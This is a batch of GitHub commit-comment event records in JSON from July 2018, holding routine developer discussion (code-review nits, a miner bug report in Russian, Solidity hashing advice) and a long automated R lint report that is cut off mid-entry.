{"id":"7990418929","type":"CommitCommentEvent","actor":{"login":"jtrump70"},"repo":{"name":"jtrump70/ReactImage"},"payload":{"comment":{"id":29767623,"position":null,"line":null,"path":null,"commit_id":"7bb599f5eb6dc272ff4b16d0c3b0665a3a028d5b","created_at":"2018-07-19T16:55:40Z","updated_at":"2018-07-19T16:55:40Z","author_association":"OWNER","body":"https://github.com/jtrump70/ReactImage/commit/7bb599f5eb6dc272ff4b16d0c3b0665a3a028d5b#diff-eae600270579316beb8b8d9b9a5732d4\r\n\r\nhttps://github.com/jtrump70/ReactImage/commit/7bb599f5eb6dc272ff4b16d0c3b0665a3a028d5b#diff-627b50d0946d435861028a7468eee1d2"}},"created_at":"2018-07-19T16:55:40Z"}
{"id":"7990420784","type":"CommitCommentEvent","actor":{"login":"Ckingbigdata"},"repo":{"name":"kaneplusplus/stat_agg"},"payload":{"comment":{"id":29767629,"position":null,"line":null,"path":null,"commit_id":"439299be304eb723722adf51fbc870e56f42c97c","created_at":"2018-07-19T16:56:03Z","updated_at":"2018-07-19T16:56:03Z","author_association":"NONE","body":"Ha! Just playing git hub..\r\n\r\nSent from my phone.\r\n\r\nOn Jul 19, 2018, at 9:42 AM, Michael Kane <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n\r\nShoot. Thanks. The change has been pushed.\r\n\r\nThanks very much!\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fkaneplusplus%2Fstat_agg%2Fcommit%2F439299be304eb723722adf51fbc870e56f42c97c%23commitcomment-29767462&data=02%7C01%7Ccasey.king%40yale.edu%7C7a7014c06fe8478809b408d5ed969d34%7Cdd8cbebb21394df8b4114e3e87abeb5c%7C0%7C1%7C636676153500176576&sdata=%2FWxMGfMFHtRHzXU4%2Fj5JlLb7aV5KFCXzXHfQtGsMgYw%3D&reserved=0>, or mute the thread<https://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fnotifications%2Funsubscribe-auth%2FAl0xFqzf6PNnDpdqTU5gg9TK0LZCLkr6ks5uILbzgaJpZM4VT0Vi&data=02%7C01%7Ccasey.king%40yale.edu%7C7a7014c06fe8478809b408d5ed969d34%7Cdd8cbebb21394df8b4114e3e87abeb5c%7C0%7C1%7C636676153500176576&sdata=Vo3NqpdCYtsBfuQgZ%2FuuXoYsN8Fo1xT4Rap7UH%2F2Tp0%3D&reserved=0>.\r\n"}},"created_at":"2018-07-19T16:56:03Z"}
{"id":"7990421737","type":"CommitCommentEvent","actor":{"login":"nlohmann"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29767637,"position":9,"line":7640,"path":"include/nlohmann/json.hpp","commit_id":"04372a8c569b8788373d7d4a655b3f40aca454f9","created_at":"2018-07-19T16:56:15Z","updated_at":"2018-07-19T16:56:15Z","author_association":"OWNER","body":"How would that look like?"}},"created_at":"2018-07-19T16:56:15Z"}
{"id":"7990422913","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29767642,"position":null,"line":null,"path":null,"commit_id":"b2ca2a0f900c8cfafb6cf5546fcbaaf0be4aee35","created_at":"2018-07-19T16:56:29Z","updated_at":"2018-07-19T16:56:29Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3713custom](https://3713custom-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/security](https://3713custom-static-docs.pantheonsite.io/docs/security)\n"}},"created_at":"2018-07-19T16:56:29Z"}
{"id":"7990423786","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29767645,"position":null,"line":null,"path":null,"commit_id":"6e2fe1e19067f01d502e0c62349e3250fdda2261","created_at":"2018-07-19T16:56:40Z","updated_at":"2018-07-19T16:56:40Z","author_association":"CONTRIBUTOR","body":"Added hearing. Removed stairs."}},"created_at":"2018-07-19T16:56:40Z"}
{"id":"7990426347","type":"CommitCommentEvent","actor":{"login":"cybrnook"},"repo":{"name":"jlesage/docker-handbrake"},"payload":{"comment":{"id":29767653,"position":null,"line":null,"path":null,"commit_id":"2382ffeb51b00371e7fa061861fcdd70f34e012c","created_at":"2018-07-19T16:57:12Z","updated_at":"2018-07-19T16:57:12Z","author_association":"NONE","body":"Performance benefits, as initial output is as fast as the read of the source. As well, saves precious \"writes\" in the event your staging area is on cache, like me, which is an nvme SSD."}},"created_at":"2018-07-19T16:57:12Z"}
{"id":"7990426489","type":"CommitCommentEvent","actor":{"login":"KPS-GitHub"},"repo":{"name":"KPS-GitHub/Portfolio"},"payload":{"comment":{"id":29767654,"position":null,"line":null,"path":null,"commit_id":"63d62a242889b1be8f42a6e2a4580a462fffa3ec","created_at":"2018-07-19T16:57:14Z","updated_at":"2018-07-19T16:57:14Z","author_association":"OWNER","body":"I guess I just made my little css face smaller."}},"created_at":"2018-07-19T16:57:14Z"}
{"id":"7990427654","type":"CommitCommentEvent","actor":{"login":"asmolin"},"repo":{"name":"yuzi-co/Forager"},"payload":{"comment":{"id":29767655,"position":null,"line":null,"path":null,"commit_id":"f1e7fee84c87aeb803cfcb13c66726aecbb7683a","created_at":"2018-07-19T16:57:28Z","updated_at":"2018-07-19T16:57:28Z","author_association":"NONE","body":"Майнер с ошибкой.\r\nПри алгоритме x16s пишет Unknown algo parameter 'x16s'. Перепробовал разные комбинации с заменой на заглавные - не помогает.\r\nПри алгоритме x16r не проходит бенчмарк.\r\nЛучше на прошлую версию вернуться, т.к. та хоть работала."}},"created_at":"2018-07-19T16:57:28Z"}
{"id":"7990427728","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"stepa2/BetterXRay"},"payload":{"comment":{"id":29767656,"position":null,"line":null,"path":null,"commit_id":"ecf01118d2002b3ff0efb3017818308b6fbd9128","created_at":"2018-07-19T16:57:29Z","updated_at":"2018-07-19T16:57:29Z","author_association":"NONE","body":"Lol"}},"created_at":"2018-07-19T16:57:29Z"}
{"id":"7990431869","type":"CommitCommentEvent","actor":{"login":"arcanis"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29767661,"position":94,"line":739,"path":"lib/_http_client.js","commit_id":"bba500d0eac378662bb7dbd4ef1ac4232cedca66","created_at":"2018-07-19T16:58:22Z","updated_at":"2018-07-19T16:58:22Z","author_association":"NONE","body":"This code is breaking. I haven't pinpoint the exact conditions, but the Yarn tests are now throwing exception from this location (we use the `request` module, if that's of any help).\r\n\r\nhttps://circleci.com/gh/yarnpkg/yarn/18312?utm_campaign=vcs-integration-link&utm_medium=referral&utm_source=github-build-link\r\n\r\nThe problem is consistently reproducible, and doesn't occur with Node 10.6."}},"created_at":"2018-07-19T16:58:22Z"}
{"id":"7990435657","type":"CommitCommentEvent","actor":{"login":"ajefts"},"repo":{"name":"topcoder-platform/tc-online-review"},"payload":{"comment":{"id":29767668,"position":null,"line":null,"path":null,"commit_id":"9da985c0a43a09e281ed03b93ea9f5f9bbaa9ad4","created_at":"2018-07-19T16:59:09Z","updated_at":"2018-07-19T16:59:09Z","author_association":"MEMBER","body":"@BadalZ I did a small config update.  Can we roll this with the next release you do?  Would that be by next week?"}},"created_at":"2018-07-19T16:59:09Z"}
{"id":"7990437991","type":"CommitCommentEvent","actor":{"login":"MichalStrehovsky"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29767675,"position":103,"line":230,"path":"src/ILCompiler.ReadyToRun/src/JitInterface/CorInfoImpl.ReadyToRun.cs","commit_id":"9d5e25baa1f121bdb9bff0f7bc2001008e3b5ef3","created_at":"2018-07-19T16:59:37Z","updated_at":"2018-07-19T16:59:37Z","author_association":"NONE","body":"Nit: this `GetOrCreate` naming doesn't match the general naming we use for `NodeFactory` methods (all of them are `GetOrCreate` by convention, because the sole purpose of the class is to be a factory of nodes). I know that `ReadyToRunHelper` name is taken right now, but it should be pretty easy to move the declaration of it to `RyuJitNodeFactory` (I can do that next week). So maybe this one can have a weirder name, but the rest should probably follow suit with the other factory methods."}},"created_at":"2018-07-19T16:59:37Z"}
{"id":"7990438305","type":"CommitCommentEvent","actor":{"login":"theodelrieu"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29767677,"position":9,"line":7640,"path":"include/nlohmann/json.hpp","commit_id":"04372a8c569b8788373d7d4a655b3f40aca454f9","created_at":"2018-07-19T16:59:41Z","updated_at":"2018-07-19T16:59:41Z","author_association":"CONTRIBUTOR","body":"```cpp\r\nNLOHMANN_BASIC_JSON_TPL_DECLARATION\r\ninline viod swap<NLOHMANN_BASIC_JSON_TPL>(NLOHMANN_BASIC_JSON_TPL& j1, NLOHMANN_BASIC_JSON_TPL&j2);\r\n```\r\n\r\nDid not try it out though, so might fail miserably to compile"}},"created_at":"2018-07-19T16:59:41Z"}
{"id":"7990441391","type":"CommitCommentEvent","actor":{"login":"Shoaib0597"},"repo":{"name":"Martichou/android_device_motorola_potter"},"payload":{"comment":{"id":29767694,"position":null,"line":null,"path":null,"commit_id":"654854f3bc695a7cfbcc5ff11d7d3943b67869af","created_at":"2018-07-19T17:00:19Z","updated_at":"2018-07-19T17:00:19Z","author_association":"NONE","body":"Hey, in CPU-Sets, Core 0 means Core 0 of big Cluster or LITTLE Cluster? As in this commit, I see that you set background and system-background to 0-1 and 0-3 respectively. So, I am confused here. as 0-3 are should mean big Cluster, I guess."}},"created_at":"2018-07-19T17:00:19Z"}
{"id":"7990444371","type":"CommitCommentEvent","actor":{"login":"nlohmann"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29767698,"position":9,"line":7640,"path":"include/nlohmann/json.hpp","commit_id":"04372a8c569b8788373d7d4a655b3f40aca454f9","created_at":"2018-07-19T17:00:54Z","updated_at":"2018-07-19T17:00:54Z","author_association":"OWNER","body":"I'll try."}},"created_at":"2018-07-19T17:00:54Z"}
{"id":"7990446489","type":"CommitCommentEvent","actor":{"login":"MichalStrehovsky"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29767700,"position":132,"line":481,"path":"src/ILCompiler.ReadyToRun/src/JitInterface/CorInfoImpl.ReadyToRun.cs","commit_id":"9d5e25baa1f121bdb9bff0f7bc2001008e3b5ef3","created_at":"2018-07-19T17:01:20Z","updated_at":"2018-07-19T17:01:20Z","author_association":"NONE","body":"Looking at this, maybe we should try to share `getCallInfo` and add a bunch of `#if READYTORUN`. @jkotas, @davidwrighton, what do you think?"}},"created_at":"2018-07-19T17:01:20Z"}
{"id":"7990455786","type":"CommitCommentEvent","actor":{"login":"TheManawaha"},"repo":{"name":"orcas-elite/example-setups"},"payload":{"comment":{"id":29767710,"position":null,"line":null,"path":null,"commit_id":"67a3652ccae78f74dc61e7a037aea5a5d22cf55a","created_at":"2018-07-19T17:03:15Z","updated_at":"2018-07-19T17:03:15Z","author_association":"COLLABORATOR","body":"Also added span tags to record if fallback method of a HystrixCommand method has been executed."}},"created_at":"2018-07-19T17:03:15Z"}
{"id":"7990457742","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29767718,"position":5,"line":8,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-19T17:03:41Z","updated_at":"2018-07-19T17:03:41Z","author_association":"NONE","body":"Nah. Just make the hash `keccak256(_passwordPayee, exchange)`"}},"created_at":"2018-07-19T17:03:41Z"}
{"id":"7990459510","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29767720,"position":5,"line":8,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-19T17:04:04Z","updated_at":"2018-07-19T17:04:04Z","author_association":"NONE","body":"Then, when the exchange calls, you check `keccak256(_passwordPayee, msg.sender)`..."}},"created_at":"2018-07-19T17:04:04Z"}
{"id":"7990460960","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29767724,"position":null,"line":null,"path":null,"commit_id":"51439442c93884bea690d5ab7a71bc17fd5252ee","created_at":"2018-07-19T17:04:21Z","updated_at":"2018-07-19T17:04:21Z","author_association":"NONE","body":"[R/as_char_no_warn.R:27:12:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/as_char_no_warn.R#L27) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return(fastIntToStringRcpp(x))\n           ^~~~~~~~~~~~~~~~~~~\n```\n[R/categorize.R:63:39:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/categorize.R#L63) *style:* **Variable and function names should be all lowercase.**\n```r\n​                       comorbid_fun = comorbidMatMul,\n                                      ^~~~~~~~~~~~~~\n```\n[R/categorize.R:169:39:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/categorize.R#L169) *style:* **Variable and function names should be all lowercase.**\n```r\n​                       comorbid_fun = comorbidMatMulSimple,\n                                      ^~~~~~~~~~~~~~~~~~~~\n```\n[R/comorbid.R:215:42:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/comorbid.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​                          comorbid_fun = comorbidMatMulSimple,\n                                         ^~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:132:1:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/guess.R#L132) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​guess_version.data.frame <- function(x, short_code = NULL, icd_name = NULL, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:191:10:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/guess.R#L191) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  ver <- guess_version.data.frame(x, icd_name = icd_name)\n         ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/parse.R:268:10:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/parse.R#L268) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"740\", \"759\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:270:10:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/parse.R#L270) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"280\", \"289\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:304:1:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/parse.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​fixSubchapterNa <- function(x, start, end) {\n^~~~~~~~~~~~~~~\n```\n[R/score.R:74:1:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/score.R#L74) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​charlson.data.frame <- function(x, visit_name = NULL,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/score.R:308:1:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/score.R#L308) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​van_walraven.data.frame <- function(x, visit_name = NULL, return_df = FALSE,\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/util.R:189:1:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/R/util.R#L189) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​get_visit_name.data.frame <- function(x, visit_name = NULL) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:606:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L606) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:616:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L616) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 1, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:617:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L617) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:620:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L620) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 2, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:621:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L621) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 5, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:624:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L624) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:625:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L625) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:628:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L628) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:629:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L629) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:632:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L632) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:633:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L633) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:636:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L636) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:637:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L637) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:652:5:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-comorbid-maps-icd9.R#L652) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:284:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L284) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:285:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L285) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:286:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L286) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:287:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L287) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:288:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L288) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:289:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L289) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:295:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L295) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:296:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L296) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:297:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L297) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:298:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L298) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:299:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L299) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:300:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L300) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:309:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:310:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L310) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:311:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L311) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:312:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L312) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:313:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L313) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:314:18:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L314) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:321:16:](https://github.com/jackwasey/icd/blob/51439442c93884bea690d5ab7a71bc17fd5252ee/tests/tests-deprecated/test-convert.R#L321) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"001\", 